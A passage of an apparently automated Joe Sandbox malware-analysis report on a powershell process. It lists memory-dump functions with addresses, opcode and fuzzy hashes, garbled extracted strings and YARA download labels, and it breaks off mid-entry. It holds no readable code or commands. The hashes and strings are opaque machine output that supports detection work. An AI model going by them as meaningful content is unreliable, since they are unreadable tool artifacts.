                                                                            • Opcode ID: f6fa96e679571ae9e5e30e9de50568f2e98e2f4647541d79c14fa86071380119
                                                                            • Instruction ID: 71d7e7b613882a9c477cfc5663928852685b27d492fabc4fee2c27549f87e5f0
                                                                            • Opcode Fuzzy Hash: f6fa96e679571ae9e5e30e9de50568f2e98e2f4647541d79c14fa86071380119
                                                                            • Instruction Fuzzy Hash: A5F082757007149FC7149A59D88496F77E9EB89271B00452DE14AC7350DE30AC4187A0
                                                                            Function 033A90E8 Relevance: .0, Instructions: 31COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2f67e9a5b268a38c3436b3e0048927049ee14126fb6c227a67880001a0714aa5
                                                                            • Instruction ID: 4de01ea2e200d0827978b86d07fdc9643a7b4b94cf3a4dae8ca4b226c282babb
                                                                            • Opcode Fuzzy Hash: 2f67e9a5b268a38c3436b3e0048927049ee14126fb6c227a67880001a0714aa5
                                                                            • Instruction Fuzzy Hash: 59F02739B006144BE304EB68D08439B77A6DBC1324F10C12ED9194B389CE3A6845C7F1
                                                                            Function 033A7697 Relevance: .0, Instructions: 31COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 75d8b45f91ccfef28c3fc36e9dc2b7d8289d664e3f97a1cb7c49aef2e283c42a
                                                                            • Instruction ID: cf59dc6022b6f605352455a9c5b192aa2ee4922603c91da7ae4742d8af41c869
                                                                            • Opcode Fuzzy Hash: 75d8b45f91ccfef28c3fc36e9dc2b7d8289d664e3f97a1cb7c49aef2e283c42a
                                                                            • Instruction Fuzzy Hash: 44F0A0397006048FCB00EBAD98C0AAABBE6EFC83517098194E609CB324DF34CC028BD0
                                                                            Function 033ADE48 Relevance: .0, Instructions: 30COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a53f414533a28f5976d9e5a562622762d3de2467586fa5c67c349eb2ee14d5fe
                                                                            • Instruction ID: fe2b0d4ad07b07ed0ba92dc3ea8cce368c616db5337ec48965d6f50967fab2d7
                                                                            • Opcode Fuzzy Hash: a53f414533a28f5976d9e5a562622762d3de2467586fa5c67c349eb2ee14d5fe
                                                                            • Instruction Fuzzy Hash: 03E0E5353005108F8210DB1DD898C2AB7FAEFCE66571900A9E549CB735DA61EC01CB90
                                                                            Function 033AAF88 Relevance: .0, Instructions: 29COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1acb5e21946fe64ae730caf465de3988f4d9b1ed2ea617580ccad7fc41e1ffc2
                                                                            • Instruction ID: 3fc7cb483703330dbd6c653f4818c3e4fca130b37884f69a6e29ce88313fee62
                                                                            • Opcode Fuzzy Hash: 1acb5e21946fe64ae730caf465de3988f4d9b1ed2ea617580ccad7fc41e1ffc2
                                                                            • Instruction Fuzzy Hash: 4EE01267B1D7951B8B1ED12D6C94466EB67CEC752034942BAA144CF296D8218805C394
                                                                            Function 033A9549 Relevance: .0, Instructions: 26COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cf8cfb42ea9e3b282e4c06c29677a1f0556bd8db7bb5989057c77ca4821a4972
                                                                            • Instruction ID: 93b1097dbe7287a6fad74245d2de208fb2bad04a725d3116c03059faf9161b61
                                                                            • Opcode Fuzzy Hash: cf8cfb42ea9e3b282e4c06c29677a1f0556bd8db7bb5989057c77ca4821a4972
                                                                            • Instruction Fuzzy Hash: 45E0C22AB026A9534518A0BE1C907B7FBCECED20A174C02B5EA08DF307EE14CC0243F2
                                                                            Function 033A8973 Relevance: .0, Instructions: 26COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 63644fdce0eb37ee22e9cbbc7c5c34dd6d3a50a0efe51e1dee20c58ae3e5db22
                                                                            • Instruction ID: 47be8545ee05352f6ec4fbeb0ceced7d3a97a9b951df01eb3b79dbbf1d28fcf2
                                                                            • Opcode Fuzzy Hash: 63644fdce0eb37ee22e9cbbc7c5c34dd6d3a50a0efe51e1dee20c58ae3e5db22
                                                                            • Instruction Fuzzy Hash: E1E09235B1461497CF09A779944C2AEBA56EBC4725F14802EE60E87246CF2A480693D5
                                                                            Function 033A9168 Relevance: .0, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 797e91c5cf9a4da8fa6c93ccba1a26284f6cf28b85bcb77e0c2604a370500b43
                                                                            • Instruction ID: ab922641785ed266248ea440e410136ef002c872a311a8e64461dde333c80ca9
                                                                            • Opcode Fuzzy Hash: 797e91c5cf9a4da8fa6c93ccba1a26284f6cf28b85bcb77e0c2604a370500b43
                                                                            • Instruction Fuzzy Hash: 82F06D749003044BD760DB78D8DC39ABBE9EB45320F10846DD51ED7345DB39A880CB90
                                                                            Function 033A8739 Relevance: .0, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 102ac0b197d81772f1b9670cf8aeda97672bfdbaa1a99d0a4ae219c280b3f006
                                                                            • Instruction ID: e53797e28918f1be0da692de99b86268c475eaf1a09a1b1e014475834befc214
                                                                            • Opcode Fuzzy Hash: 102ac0b197d81772f1b9670cf8aeda97672bfdbaa1a99d0a4ae219c280b3f006
                                                                            • Instruction Fuzzy Hash: E2E0D834C241598BCF49EBBCD48A4FDBF34EA11212B1041ADE55396647DA32558ACBC1
                                                                            Function 033A8978 Relevance: .0, Instructions: 24COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d1889f88d99ba7e29321ea11934a0ef1d5fa91db3d4b40e60dabe96c186579e3
                                                                            • Instruction ID: e79aa2b7adc672ff6d7a096658712c11493ec9e8c2b980b73322fe54f3fab673
                                                                            • Opcode Fuzzy Hash: d1889f88d99ba7e29321ea11934a0ef1d5fa91db3d4b40e60dabe96c186579e3
                                                                            • Instruction Fuzzy Hash: C1E0263970471497CF0DF77CA40C2AEBA56EBC4724F00802ED60A87346CF39480693D9
                                                                            Function 033A9550 Relevance: .0, Instructions: 23COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 19536fd49bc3fca895f25c5113d34d06c52a0c6575f87b7e5ca080af954a51e1
                                                                            • Instruction ID: 30a22294b1600adc89a78eb56585a1486126a82a547066df8305b194096cd2f2
                                                                            • Opcode Fuzzy Hash: 19536fd49bc3fca895f25c5113d34d06c52a0c6575f87b7e5ca080af954a51e1
                                                                            • Instruction Fuzzy Hash: 88D05E16B02629174554A0BE1C807BBE6CECAC64A17090176EA09DF242ED40CC0103F2
                                                                            Function 033A8800 Relevance: .0, Instructions: 23COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d4c94f150b3ca5992840d59d4192e045c529b87a00868bf431d15d2b96f43eb4
                                                                            • Instruction ID: 02c8184a69a78f8b23961672a97dd0ffdaef700383985e43757693b46de9dccd
                                                                            • Opcode Fuzzy Hash: d4c94f150b3ca5992840d59d4192e045c529b87a00868bf431d15d2b96f43eb4
                                                                            • Instruction Fuzzy Hash: B7E0D834D2870A4BCB04DB6CD486569FFB9DB15306B10806CDD089B746DE315851CBC0
                                                                            Function 033ADCE8 Relevance: .0, Instructions: 23COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                            • Instruction ID: 4106cafb8f840423cc8f149371d5a7de228f66c76446c877db2535ceba424cda
                                                                            • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                            • Instruction Fuzzy Hash: DBE08635B10014978B08DA5DD4604EDF7AADFCC220F04807AD90AA7B40DA32591587E1
                                                                            Function 033AF3C0 Relevance: .0, Instructions: 18COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d59175d3c8062fdea397417b0ccb9407b83d4c1e16576c07acde6abb07f68e3b
                                                                            • Instruction ID: 873a5b1c95079fc634fb09d4856812eb5346bd80f2d552c0301836bca8e83ccb
                                                                            • Opcode Fuzzy Hash: d59175d3c8062fdea397417b0ccb9407b83d4c1e16576c07acde6abb07f68e3b
                                                                            • Instruction Fuzzy Hash: A4E01A70E0024A8F8780DFB88981699FBF0EF58200B1080AED518D7211E6324652CF81
                                                                            Function 033AF3D0 Relevance: .0, Instructions: 16COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                            • Instruction ID: 4a2583b14e7344ba485d590c9ff73074eb775cb3cb7c980dcd27e7e62f736eee
                                                                            • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                            • Instruction Fuzzy Hash: 62D067B0D046099F8B80EFADC94156EFBF4EB58200F6085AA8919E7301E7329A528BD1
                                                                            Function 033A8748 Relevance: .0, Instructions: 15COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 41f0fbbf2e13e4638712fc8d210e8ddd49d192380bf617fa4da1738e5997fc34
                                                                            • Instruction ID: 16bbdd9ed72440a8efd798a47ae97bfcdd68d49ebf60722f61ffda96cb5cec9c
                                                                            • Opcode Fuzzy Hash: 41f0fbbf2e13e4638712fc8d210e8ddd49d192380bf617fa4da1738e5997fc34
                                                                            • Instruction Fuzzy Hash: 92D017308141098BCF48EBA8E85A4BDBB34FA10302F51816DE91752996EA311A9ACBC0
                                                                            Function 033A8810 Relevance: .0, Instructions: 15COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 80c0509d6f4ac94d1fe18dddaf8d3d8c842be6b41bddd9c446764af719daa9a9
                                                                            • Instruction ID: c88b7d9963b70f1aecfb86b520bd37cc544b8e1b6080c504446298adcbadde0c
                                                                            • Opcode Fuzzy Hash: 80c0509d6f4ac94d1fe18dddaf8d3d8c842be6b41bddd9c446764af719daa9a9
                                                                            • Instruction Fuzzy Hash: 88D01734A1820A8B8B48EFA8E44686EBFB5EB44300F10816DDE0993755EA305845CBC1
                                                                            Function 033A7938 Relevance: .0, Instructions: 11COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1f9d038ba7c5a0eefefd2923f25bb85b4dfd90e4b16656a6f316be802214d7f8
                                                                            • Instruction ID: 19c0a18f0acde440408fa6b68382b8e5c8b4040eb02239018768dd4bebbd6166
                                                                            • Opcode Fuzzy Hash: 1f9d038ba7c5a0eefefd2923f25bb85b4dfd90e4b16656a6f316be802214d7f8
                                                                            • Instruction Fuzzy Hash: F7C0123904A3889BCB259B3990548583F21AF4112430104EDE88A5B2B78AB2C486CA01
                                                                            Function 033A7EA0 Relevance: .0, Instructions: 11COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: daf68520c7bb7bbdbc3c547510a20a29fa8a3c2cac8db78562c71c608bcb7294
                                                                            • Instruction ID: ff28d0e8ef79b5e9f6253e2736fa38db5c91456cbe18be145dd678f6e7698a91
                                                                            • Opcode Fuzzy Hash: daf68520c7bb7bbdbc3c547510a20a29fa8a3c2cac8db78562c71c608bcb7294
                                                                            • Instruction Fuzzy Hash: 91C0482A24FBC4AEE313123548205466F322A8381478F02CFC580DFAA3CA4E880ACB52
                                                                            Function 033A7940 Relevance: .0, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 21a57a2f4df29b8d4c9bd9f9717d1bd196f8a484cc19c9e069ca11d70dc4d127
                                                                            • Instruction ID: af04301c2be82484236661d0df6fdc6380a7cddd2f6942150ec8c4db205e1063
                                                                            • Opcode Fuzzy Hash: 21a57a2f4df29b8d4c9bd9f9717d1bd196f8a484cc19c9e069ca11d70dc4d127
                                                                            • Instruction Fuzzy Hash: A4B0923104470C8FC2486F76A505914732AEB8021538004E9E80E0B3A68E36E885CA44

                                                                            Non-executed Functions

                                                                            Function 07961BE0 Relevance: 17.9, Strings: 14, Instructions: 407COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2115762177.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7960000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'cq$4'cq$4'cq$4'cq$pij$tPcq$tPcq$J!l$J!l$J!l$J!l$J!l$r l$r l
                                                                            • API String ID: 0-2217942572
                                                                            • Opcode ID: a6bbe1eb5b5005ed851103fc868caa01f5dd15eca161888933d812c3115f9940
                                                                            • Instruction ID: 813265210fcea5d0d1b9679b9a1187f168f5d43fd69dfa86814d47564f8966f6
                                                                            • Opcode Fuzzy Hash: a6bbe1eb5b5005ed851103fc868caa01f5dd15eca161888933d812c3115f9940
                                                                            • Instruction Fuzzy Hash: E0D139B5B0420A8FCB259B68941966BFBF6EFC6318F14C6BBC545CB252DB31C841C7A1
                                                                            Function 07963928 Relevance: 10.3, Strings: 8, Instructions: 329COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2115762177.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7960000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'cq$4'cq$tPcq$tPcq$$cq$$cq$$cq$$cq
                                                                            • API String ID: 0-3745760094
                                                                            • Opcode ID: 785eebfc1a5a0e3d3beedb12b7f2d03ab4aed73ec1ea6be302353ad4c4a7d242
                                                                            • Instruction ID: 8e67b274bc7ae85005d4744cb60de3c6301e1c338a91d602053aab78e689bb2e
                                                                            • Opcode Fuzzy Hash: 785eebfc1a5a0e3d3beedb12b7f2d03ab4aed73ec1ea6be302353ad4c4a7d242
                                                                            • Instruction Fuzzy Hash: 51B179B17042559FCB218A799809777BFFAAFC2318F14866FD446CB292CA35C841C7A1
                                                                            Function 033A7A21 Relevance: 6.5, Strings: 5, Instructions: 239COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: tM l$`dq$`dq$`dq$`dq
                                                                            • API String ID: 0-1864491702
                                                                            • Opcode ID: ebec7090e1cec6f0fe327eaa9dc6256794c92dfe6d45771619370eb08f37fefa
                                                                            • Instruction ID: 26585a87d1c3e6ea578bd4ed322850dc5668569bac0efbac25f0de67319fa895
                                                                            • Opcode Fuzzy Hash: ebec7090e1cec6f0fe327eaa9dc6256794c92dfe6d45771619370eb08f37fefa
                                                                            • Instruction Fuzzy Hash: BDB1B5B4E006099FCB55DFA9D990A9DFBF2FF88300F148629E419AB345DB30A945CF90
                                                                            Function 033A7A30 Relevance: 6.5, Strings: 5, Instructions: 234COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: tM l$`dq$`dq$`dq$`dq
                                                                            • API String ID: 0-1864491702
                                                                            • Opcode ID: 69b84ab69e3e74892ff8507c82fbf0e3d9945e0dd0c20721ed8731b6005f8fdb
                                                                            • Instruction ID: d280d30e8381158b4865412d3f60178463a6687581e4be238e4a6d4ed7b4d3c6
                                                                            • Opcode Fuzzy Hash: 69b84ab69e3e74892ff8507c82fbf0e3d9945e0dd0c20721ed8731b6005f8fdb
                                                                            • Instruction Fuzzy Hash: 75B1A6B4E006099FCB55DFA9D990A9DFBF6FF48300F108629E819AB345DB30A945CF90
                                                                            Function 07963678 Relevance: 6.4, Strings: 5, Instructions: 192COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2115762177.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7960000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'cq$4'cq$$cq$$cq$$cq
                                                                            • API String ID: 0-838516036
                                                                            • Opcode ID: 14d666e2f1f9a58220e3a5b3b01394b16cabed545f28bfda44a19f56e26cc9c7
                                                                            • Instruction ID: 3ca9c21d0e432506e464284e11a544fa02b0d4661aa8f887c0b5282ad4b2cf59
                                                                            • Opcode Fuzzy Hash: 14d666e2f1f9a58220e3a5b3b01394b16cabed545f28bfda44a19f56e26cc9c7
                                                                            • Instruction Fuzzy Hash: 06517AF570430A9FCB254A6988093A7BBBAEFC2619F24867BD405CB392DB31C841C791
                                                                            Function 033A4D62 Relevance: 6.4, Strings: 5, Instructions: 110COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: xo^$xo^$xo^$xo^$xo^
                                                                            • API String ID: 0-2425003715
                                                                            • Opcode ID: 8ed17b1726f2d62f658fec7d508d1dfb1231a8bf3cf97f7126fb1717562f93a7
                                                                            • Instruction ID: 217f95c1e2ef3c5eaa2dad013a459fe6228a5fc1d1c851129ba21a922dac59fe
                                                                            • Opcode Fuzzy Hash: 8ed17b1726f2d62f658fec7d508d1dfb1231a8bf3cf97f7126fb1717562f93a7
                                                                            • Instruction Fuzzy Hash: 0B41716260A7C05FC707DB3C94A46907FB1EF97298B0A44EBD1D4CF2A7DA149C4AC352
                                                                            Function 07965798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2115762177.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7960000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $cq$$cq$$cq$$cq
                                                                            • API String ID: 0-2876200767
                                                                            • Opcode ID: 7c6af773e0bc8fc313febe906c7030762b3f161cd1edfdf949e5934ba4114464
                                                                            • Instruction ID: f49ebe980a8bfec750550a61a7e5a44a59b5b183f03b06ef4660f3e2bdcbc6a4
                                                                            • Opcode Fuzzy Hash: 7c6af773e0bc8fc313febe906c7030762b3f161cd1edfdf949e5934ba4114464
                                                                            • Instruction Fuzzy Hash: A521ABB13003069BDB34593A9809727BB9B9BD1B19F25853AE906CB7C2DD75C8118361
                                                                            Function 079622E8 Relevance: 5.1, Strings: 4, Instructions: 83COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2115762177.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7960000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: pij$pij$J!l$J!l
                                                                            • API String ID: 0-1243686353
                                                                            • Opcode ID: 7e844eaa361f87b7e8b7df2206be5d4b7f4a83ab8b529232e82d60e7d6bf81d7
                                                                            • Instruction ID: b617e9eefa82812b1ab0ebb334a9c9f575bc5a1e822676da5540c01d44516ef5
                                                                            • Opcode Fuzzy Hash: 7e844eaa361f87b7e8b7df2206be5d4b7f4a83ab8b529232e82d60e7d6bf81d7
                                                                            • Instruction Fuzzy Hash: AD3122F1908346DFDB218F24C148AAABBF8BF02719F0886A6D8588B151D338D944CB62
                                                                            Function 07961EF8 Relevance: 5.1, Strings: 4, Instructions: 81COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2115762177.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7960000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'cq$tPcq$J!l$J!l
                                                                            • API String ID: 0-2252457019
                                                                            • Opcode ID: 905bd357882768714a794c4213c4af858eb34b4ab820962dad828991a7ec7ee8
                                                                            • Instruction ID: f4c1aad8b33d995b0dfff32c9b7279a13a46b5e24ee171603d22265a24780da6
                                                                            • Opcode Fuzzy Hash: 905bd357882768714a794c4213c4af858eb34b4ab820962dad828991a7ec7ee8
                                                                            • Instruction Fuzzy Hash: 2B21D1B1A4020ADFDB249F45C44AB36FBBAFF85318F5882A6DA055F192C772D841C7A1
                                                                            Function 07960308 Relevance: 5.1, Strings: 4, Instructions: 67COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2115762177.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7960000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'cq$4'cq$$cq$$cq
                                                                            • API String ID: 0-1126079151
                                                                            • Opcode ID: 09d3a5fcc74245ccb12acffcacdcf2ee15aa0625a60a90ca0ed7295c17ed9e95
                                                                            • Instruction ID: c6b94993ba988ad275eea2672f988a805c4c11851081a6d933cd26d0245af911
                                                                            • Opcode Fuzzy Hash: 09d3a5fcc74245ccb12acffcacdcf2ee15aa0625a60a90ca0ed7295c17ed9e95
                                                                            • Instruction Fuzzy Hash: BB116BA1B0D7964FCB2B123C68B59AA6BB7DBC2156B5D0AD7C081CF297DA144C0287D3
                                                                            Function 07962107 Relevance: 5.1, Strings: 4, Instructions: 55COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2115762177.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7960000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $cq$$cq$J!l$J!l
                                                                            • API String ID: 0-2426129395
                                                                            • Opcode ID: a3e5ff8b582793651e6af90c8b6f884c216885c98537bc544cddba3b31eb1054
